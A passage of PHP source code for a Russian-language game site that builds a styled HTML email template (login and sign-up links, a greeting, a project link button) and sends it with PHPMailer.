<li style="float: left;margin-right:5px;padding-right:6px;"><a style="color:#fff;cursor:pointer;font-size: 18px;outline:medium none;position:relative;transition: all 0.6s ease 0s;text-decoration:none;white-space:nowrap;display: block;line-height:32px;outline:medium none;padding: 0 21px;width:auto;" href="'.$url_site.'signin">Вход</a></li>
<li style="float: left;margin-right:5px;padding-right:6px;"><a style="color:#fff;cursor:pointer;font-size: 18px;outline:medium none;position:relative;transition: all 0.6s ease 0s;text-decoration:none;white-space:nowrap;display: block;line-height:32px;outline:medium none;padding: 0 21px;width:auto;" href="'.$url_site.'signup">Регистрация</a></li>
</ul></div>
</div>
<div class="contentmail">
<div class="contentallmail">
<div style="width: auto;background:rgba(0,85,218,0.9);color: #FFF633;opacity: 0.99;padding: 5px 10px 5px 10px;font-size: 19px;">
'.$content.'<br/> Желаем вам приятной игры и большого заработка.<br/></center><hr style="border-style: dotted;"/>
<center><a href="http://'.$url_site.'" style="
min-width: 120px;height: 32px;padding: 0 3px 2px;outline: none;position: relative;cursor: pointer;
border-radius: 3px;color: #555;text-shadow: 1px 1px #FAFAFA;background: -moz-linear-gradient(top, #eeeeee 0%, #e2e2e2 100%);
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#eeeeee), color-stop(100%,#e2e2e2));
background: -webkit-linear-gradient(top, #eeeeee 0%,#e2e2e2 100%);background: -o-linear-gradient(top, #eeeeee 0%,#e2e2e2 100%);
background: -ms-linear-gradient(top, #eeeeee 0%,#e2e2e2 100%);background: linear-gradient(top, #eeeeee 0%,#e2e2e2 100%);
background-color: #E8E8E8;">Перейти на наш проект</a></center><br/>
</div></div></div><div style="height: 35px;margin-top: 15px;padding-top: 14px;background: #135B98;color: #fff;text-align: center;width: 100%;display: inline-block;">&copy 2016 - все права защищены !</div></div></div>';
return $r;}

function emailsend($em,$s,$m){$url_site = getSite();
include 'class.phpmailer.php';$db=gDB();
$mail = new PHPMailer();
$mail->IsMail();
$mail->AddAddress($em);
$mail->SetFrom(gAdminEmail($db), 'Support');
$mail->Subject = $s;
$mail->MsgHTML(getMailHead($m,$db));
$mail->CharSet = "utf-8";
$send = $mail->Send();
if($send){return TRUE;}
if(!$send){return FALSE;}

}

}